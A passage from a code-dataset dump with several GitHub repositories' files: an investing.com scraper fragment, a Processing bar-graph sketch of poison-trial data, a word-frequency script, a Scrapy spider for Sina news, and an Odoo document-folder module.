r.json()['historyRows']\n '''\n return r.text\n \n def scrape_financial_summary(self):\n def get_summary(html):\n webpage = Webpage(html)\n soup = webpage.soup\n\n title = soup.find('h3').text\n df = webpage.get_span('span', ['float_lang_base_1', 'float_lang_base_2'])\n table = pd.read_html(str(soup))[0]\n return [title, table, df] # pd.concat([table, df], axis=0, ignore_index=True)\n \n stock_id = self.stock_id\n financial_summary = f\"https://www.investing.com/instruments/Financials/changesummaryreporttypeajax?action=change_report_type&pid={stock_id}&financial_id={stock_id}&ratios_id={stock_id}&period_type=\"\n annual = financial_summary + \"Annual\"\n # interim = financial_summary + \"Interim\"\n \n df = pd.DataFrame()\n soup = Webpage.from_url(annual).soup\n sections = soup.find_all('div', \"companySummaryIncomeStatement\")\n result = []\n for i in sections:\n result.append(get_summary(str(i)))\n return result\n \n'''\n10% for public companies\n15% for private companies that are scaling predictably (say above $10m in ARR, and growing greater than 40% year on year)\n20% for private companies that have not yet reached scale and predictable growth\n'''"
}
] | 2 |
frank1241/graphics_and_visualization | https://github.com/frank1241/graphics_and_visualization | b3b5225309c16109ee590ac6827194affb7d2b6d | 673b1b694de91951450ae8e8420515ac308dab15 | d32aba1c8192a87c4da086d003600e271fad62bb | refs/heads/master | 2021-05-01T06:32:30.124804 | 2018-04-18T23:15:33 | 2018-04-18T23:15:33 | 121,146,476 | 0 | 0 | null | null | null | null | null | [
{
"alpha_fraction": 0.3512137830257416,
"alphanum_fraction": 0.519577145576477,
"avg_line_length": 22.53917121887207,
"blob_id": "3169d5e375bd16c1593d4fe5a26f6d9cec05e8a7",
"content_id": "23ce65d39ef4b5259fde2b063834262ba69c1e85",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Java",
"length_bytes": 5108,
"license_type": "no_license",
"max_line_length": 163,
"num_lines": 217,
"path": "/csv_table.java",
"repo_name": "frank1241/graphics_and_visualization",
"src_encoding": "UTF-8",
"text": "Table table;\nint color_change = 1;\nint trials = 1;\nint i = 0;\nint[] poison_array;\nint[] trial_array;\nfloat[] time_array;\nfloat width = 0;\nint x_pos = 0;\n// Set Height of bar graphs\nfloat height1;\nfloat y_pos = 0;\nfloat time1 = 0;\n\nvoid setup() {\n\n size(1800, 1000);\n\n table = loadTable(\"poisons.csv\", \"header\");\n\n poison_array = new int[table.getRowCount() + 1];\n trial_array = new int[table.getRowCount() + 1];\n time_array = new float[table.getRowCount() + 1];\n\n println(table.getRowCount() + \" total rows in table\");\n\n for (TableRow row : table.rows()) {\n\n int trials = row.getInt(\"trials\");\n float time = row.getFloat(\"time\");\n int poison = row.getInt(\"poison\");\n String treat = row.getString(\"treat\");\n\n poison_array[i] = poison;\n trial_array[i] = trials;\n time_array[i] = time;\n\n println(poison_array[i]);\n println(trial_array[i]);\n println(time_array[i]);\n println(\"For trial \" + trials + \" the poison administered was poison \" + poison + \" lastin a time of \" + time + \" with a the treatment being level \" + treat);\n\n i+= 1;\n }\n\n println(poison_array);\n\n}\n\nvoid draw(){\n\n background(0,150,100);\n // Bar Graph\n fill(0,0,0);\n rect(80, 0, 20, 1000);\n rect(0, 900, 1800, 20);\n // Top line to not cross\n // text\n fill(150,0,150);\n textSize(40);\n text(\"Animal Poison Trials\", 650, 60);\n text(\"Trials\", 770, 990);\n //text(\"Time Alive Hours\", 0, 60);\n // Controls\n fill(150,150,150);\n rect(1600, 0, 200, 1000);\n fill(0, 102, 153);\n textSize(30);\n text(\"To see all \", 1620, 200);\n text(\"the poisons\", 1620, 230);\n text(\"on graph:\", 1620, 260);\n textSize(40);\n text(\"Press C\", 1620, 300);\n\n textSize(30);\n text(\"To Add a \", 1620, 650);\n text(\"Trial to\", 1620, 680);\n text(\"the graph\", 1620, 710);\n textSize(40);\n text(\"Press T\", 1620, 750);\n\n // Time\n fill(211,211,211);\n line(0, 900 - ((800/13)*1), 1600, 900 - ((800/13)*1));\n line(0, 900 - ((800/13)*2), 1600, 900 - ((800/13)*2));\n line(0, 900 - ((800/13)*3), 1600, 900 - ((800/13)*3));\n line(0, 900 - ((800/13)*4), 1600, 900 - ((800/13)*4));\n line(0, 900 - ((800/13)*5), 1600, 900 - ((800/13)*5));\n line(0, 900 - ((800/13)*6), 1600, 900 - ((800/13)*6));\n line(0, 900 - ((800/13)*7), 1600, 900 - ((800/13)*7));\n line(0, 900 - ((800/13)*8), 1600, 900 - ((800/13)*8));\n line(0, 900 - ((800/13)*9), 1600, 900 - ((800/13)*9));\n line(0, 900 - ((800/13)*10), 1600, 900 - ((800/13)*10));\n line(0, 900 - ((800/13)*11), 1600, 900 - ((800/13)*11));\n line(0, 900 - ((800/13)*12), 1600, 900 - ((800/13)*12));\n line(0, 100, 1600,100);\n\n fill(150,150,150);\n textSize(30);\n\n //Alive Hours\n text(\"0\", 60, 900);\n text(\"1\", 60, 900 - ((800/13)*1));\n text(\"2\", 60, 900 - ((800/13)*2));\n text(\"3\", 60, 900 - ((800/13)*3));\n text(\"4\", 60, 900 - ((800/13)*4));\n text(\"5\", 60, 900 - ((800/13)*5));\n text(\"6\", 60, 900 - ((800/13)*6));\n text(\"7\", 60, 900 - ((800/13)*7));\n text(\"8\", 60, 900 - ((800/13)*8));\n text(\"9\", 60, 900 - ((800/13)*9));\n text(\"10\", 40, 900 - ((800/13)*10));\n text(\"11\", 40, 900 - ((800/13)*11));\n text(\"12\", 40, 900 - ((800/13)*12));\n text(\"13\", 40, 100);\n\n fill(150,0,150);\n textSize(40);\n text(\"E\", 0, 900 - ((800/13)*3));\n text(\"V\", 0, 900 - ((800/13)*4));\n text(\"I\", 0, 900 - ((800/13)*5));\n text(\"L\", 0, 900 - ((800/13)*6));\n text(\"A\", 0, 900 - ((800/13)*7));\n text(\"S\", 0, 900 - ((800/13)*9));\n text(\"R\", 0, 900 - ((800/13)*10));\n text(\"U\", 0, 900 - ((800/13)*11));\n text(\"O\", 0, 900 - ((800/13)*12));\n text(\"H\", 0, 100);\n\n\n\n\n for (int i = 0; i < trials; i = i+1) {\n\n if(trials < 8){\n x_pos = x_pos + 200;\n width = 100;\n textSize(28);\n }\n else if(trials < 16){\n x_pos = x_pos + 100;\n width = 50;\n textSize(20);\n }\n else if(trials < 21){\n x_pos = x_pos + 75;\n width = 37.5;\n textSize(15);\n }\n else if(trials < 31){\n x_pos = x_pos + 50;\n width = 25;\n textSize(10);\n }\n else if(trials < 42){\n x_pos = x_pos + 36;\n width = 18;\n textSize(7);\n }\n else if(trials < 48){\n x_pos = x_pos + 31;\n width = 15.5;\n textSize(5);\n }\n\n if (i == 0) {\n x_pos = 115;\n }\n\n time1 = time_array[i];\n y_pos = (900-((800/13)*time1*10));\n height1 = ((800/13)*time1*10);\n\n if (color_change % 2 == 0){\n if (poison_array[i] == 1){\n fill(255,0,0);\n }\n else if (poison_array[i] == 2){\n fill(0,255,0);\n }\n else{\n fill(0,0,255);\n }\n }\n else{\n fill(150,0,150);\n }\n\n rect(x_pos, y_pos ,width, height1,7);\n text (\"Trial\" + trial_array[i], x_pos, 950);\n\n }\n}\n\nvoid keyPressed(){\nif (key == 'c' || key == 'C'){\n color_change += 1;\n }\nif (key == 't' || key == 'T'){\n if (trials == 47){\n trials = 1;\n }\n else{\n trials += 1;\n }\n }\n}\n\n// NOTES:\n\n// Make it an interactive bar Graph\n// Y-axis #'s will be constant(Time)\n// X-axis will vary based off of button(Trials)\n// Another button have a change of color(Poisons)\n// Label the axis'\n// Label the constant Y-axis\n// Label the trials: will have to be based off of trial # to change sizes and etc.\n"
},
{
"alpha_fraction": 0.5570698380470276,
"alphanum_fraction": 0.5610448718070984,
"avg_line_length": 27.847457885742188,
"blob_id": "68aea3b5ea198d71e0f031aa8920ec2fe0ca8599",
"content_id": "4b8cb5bb508c404548bee9c18185348102514d88",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 1761,
"license_type": "no_license",
"max_line_length": 80,
"num_lines": 59,
"path": "/assignment3/extract_words.py",
"repo_name": "frank1241/graphics_and_visualization",
"src_encoding": "UTF-8",
"text": "import re\r\n\r\ndef main():\r\n # Initialize output files\r\n allWordsOuptut = open(\"allwords.txt\", 'w')\r\n uniqueWordsOutput = open(\"uniquewords.txt\", 'w')\r\n wordFrequencyOutput = open(\"wordfrequency.txt\", \"w\")\r\n\r\n # Open book for reading\r\n filePath = r\"TheVisionOfHell.txt\"\r\n book = open(filePath, 'r', encoding='utf8')\r\n\r\n # create a dictionary of words and their respective frequencies\r\n wordDict = {}\r\n\r\n # read through the book line by line\r\n for line in book:\r\n # Strip line and lowercase\r\n line = line.strip().lower()\r\n word_list = re.findall(\"[a-z]+\", line)\r\n\r\n # Add words to dictionary and write to allwords.txt\r\n for word in word_list:\r\n if len(word) == 1 and (word != \"a\" and word != \"i\"):\r\n pass\r\n else:\r\n allWordsOuptut.write(word + \"\\n\")\r\n\r\n if word in wordDict:\r\n wordDict[word] = wordDict[word] + 1\r\n else:\r\n wordDict[word] = 1\r\n\r\n # Find all unique words\r\n for word in wordDict:\r\n if wordDict[word] == 1:\r\n uniqueWordsOutput.write(word + \"\\n\")\r\n\r\n # Calculate word frequencies\r\n # create a dictionary of frequencies and their number of occurences\r\n\r\n freqDict = {}\r\n for word in wordDict:\r\n if wordDict[word] in freqDict:\r\n freqDict[wordDict[word]] += 1\r\n else:\r\n freqDict[wordDict[word]] = 1\r\n\r\n freqSorted = sorted(freqDict.keys())\r\n for freq in freqSorted:\r\n wordFrequencyOutput.write(str(freq) + \": \" + str(freqDict[freq]) + \"\\n\")\r\n\r\n # close files\r\n book.close()\r\n allWordsOuptut.close()\r\n uniqueWordsOutput.close()\r\n wordFrequencyOutput.close()\r\n\r\nmain()\r\n"
},
{
"alpha_fraction": 0.7879194617271423,
"alphanum_fraction": 0.7906040549278259,
"avg_line_length": 73.4000015258789,
"blob_id": "a3d569c6e74ee36f86fe17e121011f4d085cb06a",
"content_id": "8c91359f2f4ee3c9f89030f8e948af80c2bfb79d",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Text",
"length_bytes": 745,
"license_type": "no_license",
"max_line_length": 152,
"num_lines": 10,
"path": "/assignment3/README.txt",
"repo_name": "frank1241/graphics_and_visualization",
"src_encoding": "UTF-8",
"text": "How to run extract_words.py:\nRun the extract_words.py script using either the command line (python extract_words.py) or pycharm IDE (click play button).\nMake sure that the TheVisionOfHell.txt is in the same directory as the script. The result will output three text files \nin the same directory as the script (allwords.txt, uniquewords.txt, and wordfrequency.txt). \n\nHow to run a3_novelvisualization.pde:\nMake sure that uniquewords.txt is in the same folder as the processing file. Open up the file in processing and click the play button to run the code. \n\nHow to run a3_wordfrequency.pde:\nMake sure that wordfrequency.txt is in the same folder as the processing file. Open up the file in processing and click the play button to run the code. \n"
}
] | 3 |
lqfGaara/sinaSpider | https://github.com/lqfGaara/sinaSpider | c81e93b042b3f536752bb73a731404f54cf06d96 | 550c8b33ac6e1dcd8d3d779e6d0724346eed32b1 | 0fbc02fe3a792d3f5783931977f0a0dcc20d70a6 | refs/heads/master | 2021-05-14T03:14:23.651396 | 2018-01-08T01:54:14 | 2018-01-08T01:54:14 | 116,615,214 | 1 | 0 | null | null | null | null | null | [
{
"alpha_fraction": 0.8048780560493469,
"alphanum_fraction": 0.8048780560493469,
"avg_line_length": 26.33333396911621,
"blob_id": "b51685c1780b3b2bfeee285e3fa30e46c4a17ac5",
"content_id": "16578d3172e1656f7d2a5e0c619ed26a8c6e7a5d",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 82,
"license_type": "no_license",
"max_line_length": 53,
"num_lines": 3,
"path": "/sinaSpider/start.py",
"repo_name": "lqfGaara/sinaSpider",
"src_encoding": "UTF-8",
"text": "from scrapy import cmdline\n\ncmdline.execute(\"scrapy crawl sinaNewSpider\".split())\n"
},
{
"alpha_fraction": 0.5349887013435364,
"alphanum_fraction": 0.5398796200752258,
"avg_line_length": 40.53125,
"blob_id": "b508059e582e3ed26f08173068ca293cb7d4db51",
"content_id": "2a492b1b48f4cc1d3846d72f697a064231c87950",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 2698,
"license_type": "no_license",
"max_line_length": 104,
"num_lines": 64,
"path": "/sinaSpider/spiders/sinaNewSpider.py",
"repo_name": "lqfGaara/sinaSpider",
"src_encoding": "UTF-8",
"text": "# -*- coding: utf-8 -*-\nimport scrapy\nimport os\nfrom sinaSpider.items import SinaspiderItem\n\n\nclass SinanewspiderSpider(scrapy.Spider):\n name = 'sinaNewSpider'\n allowed_domains = ['news.sina.com.cn']\n start_urls = ['http://news.sina.com.cn/guide/']\n\n def parse(self, response):\n # 父目录名\n parentNames = response.xpath('//div[@class=\"article\"]//h3/a/text()').extract()\n # 父目录对应的url\n parentUrls = response.xpath('//div[@class=\"article\"]//h3/a/@href').extract()\n # 子目录名\n chlidNames = response.xpath('//div[@class=\"article\"]//ul/li/a/text()').extract()\n # 子目录对应的url\n chlidUrls = response.xpath('//div[@class=\"article\"]//ul/li/a/@href').extract()\n items = []\n for i in range(len(parentNames)):\n parentName = \"/Users/stonelqf/Desktop/sina/\" + parentNames[i]\n if not os.path.exists(parentName):\n os.mkdir(parentName)\n for j in range(len(chlidUrls)):\n item = SinaspiderItem()\n if chlidUrls[j].startswith(parentUrls[i]):\n item['childUrl'] = chlidUrls[i]\n chlidName = parentName + \"/\" + chlidNames[j]\n if not os.path.exists(chlidName):\n os.mkdir(chlidName)\n item[\"contentFileUrl\"] = chlidName + \"/\"\n items.append(item)\n for item in items:\n yield scrapy.Request(url=item['childUrl'], meta={\"meta_1\": item}, callback=self.parse_child)\n\n def parse_child(self, response):\n meta = response.meta[\"meta_1\"]\n items = []\n for node in response.xpath('//div/a/@href').extract():\n if node.endswith(\".shtml\"):\n item = SinaspiderItem()\n item['contentFileUrl'] = meta['contentFileUrl']\n item['childUrl'] = meta['childUrl']\n item['fileUrl'] = node\n items.append(item)\n for item in items:\n yield scrapy.Request(url=item['fileUrl'], meta={\"meta_2\": item}, callback=self.last)\n\n def last(self, response):\n meta2 = response.meta[\"meta_2\"]\n title = response.xpath(\"//h1[@class=main=title]/text()\").extract()\n if len(title) != 0:\n item = SinaspiderItem()\n item['contentFileUrl'] = meta2['contentFileUrl']\n item[\"contentTitle\"] = title[0]\n contents = response.xpath('//div[@class =\"article\"]/p/text()').extract()\n text=\"\"\n if len(contents) != 0:\n for content in contents:\n text += content\n item[\"content\"]=text\n yield item\n"
},
{
"alpha_fraction": 0.6755555272102356,
"alphanum_fraction": 0.6777777671813965,
"avg_line_length": 20.428571701049805,
"blob_id": "063e5e42faa512f4af059a5a128e8ce5214627f3",
"content_id": "df54209c5340fdabc25da0066576eee31a095add",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 488,
"license_type": "no_license",
"max_line_length": 51,
"num_lines": 21,
"path": "/sinaSpider/items.py",
"repo_name": "lqfGaara/sinaSpider",
"src_encoding": "UTF-8",
"text": "# -*- coding: utf-8 -*-\n\n# Define here the models for your scraped items\n#\n# See documentation in:\n# http://doc.scrapy.org/en/latest/topics/items.html\n\nimport scrapy\n\n\nclass SinaspiderItem(scrapy.Item):\n # define the fields for your item here like:\n childUrl=scrapy.Field()\n # 文章标题\n contentTitle=scrapy.Field()\n # 文章内容\n content=scrapy.Field()\n # 文章保存路径\n contentFileUrl=scrapy.Field()\n # 文章的访问url\n fileUrl=scrapy.Field()\n"
},
{
"alpha_fraction": 0.6062378287315369,
"alphanum_fraction": 0.6101364493370056,
"avg_line_length": 31.0625,
"blob_id": "08658d712d2aef95dd43256495bf9306ac0e3d5e",
"content_id": "9fb750fd21f30d13346e0462188fc6c4edf09451",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 513,
"license_type": "no_license",
"max_line_length": 82,
"num_lines": 16,
"path": "/sinaSpider/pipelines.py",
"repo_name": "lqfGaara/sinaSpider",
"src_encoding": "UTF-8",
"text": "# -*- coding: utf-8 -*-\n\n# Define your item pipelines here\n#\n# Don't forget to add your pipeline to the ITEM_PIPELINES setting\n# See: http://doc.scrapy.org/en/latest/topics/item-pipeline.html\n\n\nclass SinaspiderPipeline(object):\n def process_item(self, item, spider):\n file = item['contentFileUrl'] + str(item[\"contentTitle\"]).strip() + \".txt\"\n print(file)\n with open(file, \"w\") as f:\n if (len(item['content']) != 0):\n f.write(item['content'])\n return item\n"
}
] | 4 |
SomagecDji/test-signature | https://github.com/SomagecDji/test-signature | 99c896cb61d46fa0f64abf6d14dadcaaa9e18cb0 | a96d0a9e7eac7ae3dfcaa1d17660cfcbb1708810 | 9c197b3019943c38c31bfbf5109586bf5ac008e8 | refs/heads/main | 2023-08-17T17:37:38.360890 | 2021-09-07T04:23:50 | 2021-09-07T04:23:50 | 398,062,777 | 0 | 0 | null | null | null | null | null | [
{
"alpha_fraction": 0.5844594836235046,
"alphanum_fraction": 0.587837815284729,
"avg_line_length": 22.68000030517578,
"blob_id": "cf1991e4307774229c7267695a3fcd05b2e3b50b",
"content_id": "c7a88d54a7b44dfb8507f95b8eec75fc14dbeb09",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 592,
"license_type": "no_license",
"max_line_length": 86,
"num_lines": 25,
"path": "/custom_documents/__manifest__.py",
"repo_name": "SomagecDji/test-signature",
"src_encoding": "UTF-8",
"text": "{\n 'name': \"Documents custom\",\n\n 'summary': \"Document management\",\n\n 'description': \"\"\"\n App to upload and manage your documents.\n \"\"\",\n\n 'author': \"Odoo\",\n 'category': 'Operations/Documents',\n 'version': '1.0',\n 'application': True,\n 'website': 'https://www.odoo.com/page/documents',\n\n # any module necessary for this one to work correctly\n 'depends': ['base', 'mail', 'portal', 'web', 'attachment_indexation','documents'],\n\n # always loaded\n 'data': [\n 'views/templates.xml',\n 'views/inherit_project_workspace_view.xml'\n ],\n\n}\n"
},
{
"alpha_fraction": 0.6007168292999268,
"alphanum_fraction": 0.6114695072174072,
"avg_line_length": 56.869564056396484,
"blob_id": "c40d02f0aa99b03c757c97764eac04a971c01585",
"content_id": "548ec06d548e675c7febbfd7b1dfc5d4ece9c5a4",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 1395,
"license_type": "no_license",
"max_line_length": 114,
"num_lines": 23,
"path": "/custom_documents/wizards/inherit_project_workspace.py",
"repo_name": "SomagecDji/test-signature",
"src_encoding": "UTF-8",
"text": "\r\nfrom datetime import datetime\r\n\r\nfrom odoo import _, api, fields, models\r\nfrom odoo.exceptions import UserError,ValidationError\r\n\r\nclass FolderInheritProjectWorkspace(models.TransientModel):\r\n _name='inherit.project.workspace'\r\n project_name=fields.Char('Nom du projet')\r\n def inherit_workspace(self):\r\n main_workspace_id=self.env['documents.folder'].search([('id','=',3)]).id\r\n document_folder=self.env['documents.folder']\r\n document_parent_0=documet_folder.create({'name':self.project_name})\r\n all_subfolders0=self.env['documents.folder'].search([('parent_folder_id','=','main_workspace_id')])\r\n if len(all_subfolders0)!=0:\r\n for i in all_subfolders0:\r\n document_folder=self.env['documents.folder']\r\n document_parent_1=documet_folder.create({'name':i.name,'parent_folder_id':document_parent_0.id})\r\n all_subfolders1=self.env['documents.folder'].search([('parent_folder_id','=',i.id)])\r\n if len(all_subfolders1)!=0:\r\n for j in all_subfolders1:\r\n document_folder=self.env['documents.folder']\r\n document_parent_2=documet_folder.create({'name':j.name,'parent_folder_id':document_parent_0.id})\r\n all_subfolders2=self.env['documents.folder'].search([('id','=',j.id)])\r\n \r\n \r\n \r\n\r\n\r\n"
},
{
"alpha_fraction": 0.5807932019233704,
"alphanum_fraction": 0.5873484015464783,
"avg_line_length": 55.48147964477539,
"blob_id": "ac89adbd502548112526a926d1a85f11df09b51c",
"content_id": "4c8ee4a7d10d62dc62d833338d040e1bcaed4605",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 3052,
"license_type": "no_license",
"max_line_length": 121,
"num_lines": 54,
"path": "/custom_documents/models/folder.py",
"repo_name": "SomagecDji/test-signature",
"src_encoding": "UTF-8",
"text": "# -*- coding: utf-8 -*-\nfrom odoo import models, fields, api, _\nfrom odoo.exceptions import ValidationError, UserError\nclass DocumentFolder(models.Model):\n _description = 'Document folder'\n _inherit = 'documents.folder' \n admin_group_ids = fields.Many2many('res.groups', 'documents_folder_admin_groups',string=\"Groupe d'écriture\")\n active=fields.Boolean('Active', default=True)\n project_name=fields.Char('Nom du projet')\n def custom_groups(self):\n folders=self.env['documents.folder'].search([])\n for folder in folders:\n if folder.parent_folder_id:\n parent_folder_id=folder.parent_folder_id.id\n #raise UserError(_(folder.group_ids))\n parent_folder=self.env['documents.folder'].search([('id','=',parent_folder_id)])\n if folder.read_group_ids:\n for id in [group.id for group in folder.read_group_ids ]:\n parent_folder.write({'read_group_ids':[(4,id)]})\n if folder.group_ids:\n for id in [group.id for group in folder.group_ids ]:\n parent_folder.write({'read_group_ids':[(4,id)]})\n return()\n def view_inherit_workspace(self):\n form_view = self.env.ref('custom_documents.inherit_workspace_form_view')\n self.ensure_one()\n return {'name': _('Merci de saisir le nom du projet:'),\n 'type': 'ir.actions.act_window',\n 'res_model': 'documents.folder',\n 'view_mode': 'form',\n 'view_id': form_view.id,\n 'res_id': self.id,\n 'target': 'new'}\n def inherit_workspace(self):\n main_workspace_id=self.env['documents.folder'].search([('id','=',3)]).id\n document_folder=self.env['documents.folder']\n document_parent_0=document_folder.create({'name':self.project_name})\n all_subfolders0=self.env['documents.folder'].search([('parent_folder_id','=',main_workspace_id)])\n if len(all_subfolders0)!=0:\n for i in all_subfolders0:\n document_folder=self.env['documents.folder']\n document_parent_1=document_folder.create({'name':i.name,'parent_folder_id':document_parent_0.id})\n all_subfolders1=self.env['documents.folder'].search([('parent_folder_id','=',i.id)])\n if len(all_subfolders1)!=0:\n for j in all_subfolders1:\n document_folder=self.env['documents.folder']\n document_parent_2=document_folder.create({'name':j.name,'parent_folder_id':document_parent_1.id})\n all_subfolders2=self.env['documents.folder'].search([('id','=',j.id)])\n return {'type': 'ir.actions.act_window_close'}\n def delete_folders(self):\n self.env.cr.execute(\"\"\"delete from documents_folder where create_date > (select NOW() - interval '1' hour)\"\"\")\n\"\"\"class SignSendRequest(models.Model):\n _description = 'Sign Send Request'\n _inherit = 'sign.send.request' \"\"\"\n\n"
},
{
"alpha_fraction": 0.7674418687820435,
"alphanum_fraction": 0.7674418687820435,
"avg_line_length": 39,
"blob_id": "6a5859aae94e33f6cf87604a0bf08e6ee4d38a0c",
"content_id": "ff66bad180ea59656cdbb036d9488dbcbc10db2e",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 43,
"license_type": "no_license",
"max_line_length": 39,
"num_lines": 1,
"path": "/custom_documents/wizards/__init__.py",
"repo_name": "SomagecDji/test-signature",
"src_encoding": "UTF-8",
"text": "from . import inherit_project_workspace\r\n\r\n"
},
{
"alpha_fraction": 0.7272727489471436,
"alphanum_fraction": 0.7272727489471436,
"avg_line_length": 20,
"blob_id": "145dafdfdff7f0fdc7cc2d612ac7a4f241682cb6",
"content_id": "1a09632378cb7faf5c2868ce0ea52960f69e7c25",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 22,
"license_type": "no_license",
"max_line_length": 20,
"num_lines": 1,
"path": "/custom_documents/models/__init__.py",
"repo_name": "SomagecDji/test-signature",
"src_encoding": "UTF-8",
"text": "from . import folder\r\n"
}
] | 5 |
Subsets and Splits